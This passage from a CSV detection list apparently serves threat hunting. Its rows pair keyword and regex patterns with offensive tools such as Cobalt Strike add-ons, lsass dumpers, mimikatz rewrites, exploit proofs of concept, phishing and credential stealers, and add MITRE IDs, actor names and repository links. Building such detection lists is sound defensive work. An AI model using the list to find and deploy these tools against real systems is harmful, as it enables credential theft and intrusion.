TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37515" "*caeaaee0273746fee0c2f2e790f3215075a28a8ec6ffc22d18f82e68aea555a2*",".{0,1000}caeaaee0273746fee0c2f2e790f3215075a28a8ec6ffc22d18f82e68aea555a2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37516" "*caf0940d2bfc54a2efd684ccf47ebddb79da9331584b4781924e260372cca582*",".{0,1000}caf0940d2bfc54a2efd684ccf47ebddb79da9331584b4781924e260372cca582.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37518" "*caf10b7ae65ee32d8a5fc68bfe5fa8bbe73a3ebd5a9602ebf49ec977edb1e38b*",".{0,1000}caf10b7ae65ee32d8a5fc68bfe5fa8bbe73a3ebd5a9602ebf49ec977edb1e38b.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37519" "*caf9a055f2ff381b97c14536634a3bda03c79b47402719bfe8145b3285351450*",".{0,1000}caf9a055f2ff381b97c14536634a3bda03c79b47402719bfe8145b3285351450.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","37520" "*caf9a055f2ff381b97c14536634a3bda03c79b47402719bfe8145b3285351450*",".{0,1000}caf9a055f2ff381b97c14536634a3bda03c79b47402719bfe8145b3285351450.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","37521" "*cafb5561a99ca3e74b06e53a71967c69d7037985652179031acd7ecc89704200*",".{0,1000}cafb5561a99ca3e74b06e53a71967c69d7037985652179031acd7ecc89704200.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37522" "*caffix*amass*",".{0,1000}caffix.{0,1000}amass.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1590 - T1591 - T1592 - T1593 - T1594 - T1595","TA0009 - TA0011 - TA0007","N/A","EMBER BEAR","Reconnaissance","https://github.com/OWASP/Amass","1","0","#linux","N/A","5","10","12855","1965","2025-04-21T23:28:45Z","2018-07-10T16:05:08Z","37523" "*caffix/amass*",".{0,1000}caffix\/amass.{0,1000}","offensive_tool_keyword","Amass","In-depth subdomain enumeration tool that performs 
scraping. recursive brute forcing. crawling of web archives. name altering and reverse DNS sweeping","T1593 - T1594 - T1595 - T1567 - T1569","TA0007 - TA0009 - TA0004 - TA0005 - TA0011","N/A","EMBER BEAR","Reconnaissance","https://github.com/OWASP/Amass","1","0","#linux","N/A","5","10","12855","1965","2025-04-21T23:28:45Z","2018-07-10T16:05:08Z","37524" "*calc.zip /pass:xOVTzio*",".{0,1000}calc\.zip\s\/pass\:xOVTzio.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","37525" "*calebstewart/bypass-clm*",".{0,1000}calebstewart\/bypass\-clm.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","1","N/A","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","37526" "*calebstewart/CVE-2021-1675*",".{0,1000}calebstewart\/CVE\-2021\-1675.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/calebstewart/CVE-2021-1675","1","1","N/A","N/A","10","10","1049","230","2021-07-05T08:54:06Z","2021-07-01T23:45:58Z","37527" "*calebstewart/pwncat*",".{0,1000}calebstewart\/pwncat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","37528"
"*-CalendarNTLMLeak*",".{0,1000}\-CalendarNTLMLeak.{0,1000}","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","1","N/A","N/A","N/A","4","344","63","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z","37529" "*Call KaynLoader in a remote thread*",".{0,1000}Call\sKaynLoader\sin\sa\sremote\sthread.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","37530" "*Call KaynLoader in a remote thread*",".{0,1000}Call\sKaynLoader\sin\sa\sremote\sthread.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","37531" "*CALLBACK_HASHDUMP*",".{0,1000}CALLBACK_HASHDUMP.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","37532" "*CALLBACK_KEYSTROKES*",".{0,1000}CALLBACK_KEYSTROKES.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - 
Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","37533" "*CALLBACK_NETVIEW*",".{0,1000}CALLBACK_NETVIEW.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 
- Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","37534" "*CALLBACK_PORTSCAN*",".{0,1000}CALLBACK_PORTSCAN.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","37535" 
"*CALLBACK_TOKEN_STOLEN*",".{0,1000}CALLBACK_TOKEN_STOLEN.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","37536" "*CallBackDump*dumpXor*",".{0,1000}CallBackDump.{0,1000}dumpXor.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","N/A","10","10","549","76","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z","37537" "*CallbackDump.exe*",".{0,1000}CallbackDump\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - 
T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","N/A","10","10","549","76","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z","37538" "*CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor*",".{0,1000}CallDllMainSC1\/ThisIsNotTheStringYouAreLookingFor.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","37539" "*calling MySQL shell. 
To quit type 'x' or 'q' and press ENTER*",".{0,1000}calling\sMySQL\sshell\.\sTo\squit\stype\s\'x\'\sor\s\'q\'\sand\spress\sENTER.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#content","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","37540" "*CamHacker has a new update!*",".{0,1000}CamHacker\shas\sa\snew\supdate!.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","37541" "*CamHacker updated successfully*",".{0,1000}CamHacker\supdated\ssuccessfully.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","37542" "*CamHacker/releases/latest/download/websites.zip*",".{0,1000}CamHacker\/releases\/latest\/download\/websites\.zip.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","N/A","10","","N/A","","","","37543" "*cam-hackers.py*",".{0,1000}cam\-hackers\.py.{0,1000}","offensive_tool_keyword","Cam-Hackers","Hack Cameras CCTV FREE","T1125","TA0007","N/A","N/A","Discovery","https://github.com/AngelSecurityTeam/Cam-Hackers","1","1","N/A","N/A","6","10","2025","512","2024-08-06T18:49:02Z","2019-11-16T18:49:35Z","37544" "*Cam-Hackers-master.zip*",".{0,1000}Cam\-Hackers\-master\.zip.{0,1000}","offensive_tool_keyword","Cam-Hackers","Hack Cameras CCTV FREE","T1125","TA0007","N/A","N/A","Discovery","https://github.com/AngelSecurityTeam/Cam-Hackers","1","1","N/A","N/A","6","10","2025","512","2024-08-06T18:49:02Z","2019-11-16T18:49:35Z","37545" "*can now impersonate users on * via S4U2Proxy*",".{0,1000}can\snow\simpersonate\susers\son\s.{0,1000}\svia\sS4U2Proxy.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","#content","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","37546" "*can_flood_frames*",".{0,1000}can_flood_frames.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","37547" "*Cancelling the password spray.*",".{0,1000}Cancelling\sthe\spassword\sspray\..{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","37548" "*CandyPotato.exe *",".{0,1000}CandyPotato\.exe\s.{0,1000}","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. 
This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","Volatile Cedar","Exploitation tool","https://github.com/klezVirus/CandyPotato","1","0","N/A","N/A","N/A","4","306","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z","37549" "*canix1/ADACLScanner*",".{0,1000}canix1\/ADACLScanner.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","1","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","37550" "*can-kat/cstealer*",".{0,1000}can\-kat\/cstealer.{0,1000}","offensive_tool_keyword","cstealer","stealer discord token grabber, crypto wallet stealer, cookie stealer, password stealer, file stealer etc. app written in Python.","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/can-kat/cstealer","1","1","N/A","N/A","10","","N/A","","","","37551" "*Cannot enable SE_DEBUG_NAME privilege on remote host*",".{0,1000}Cannot\senable\sSE_DEBUG_NAME\sprivilege\son\sremote\shost.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. 
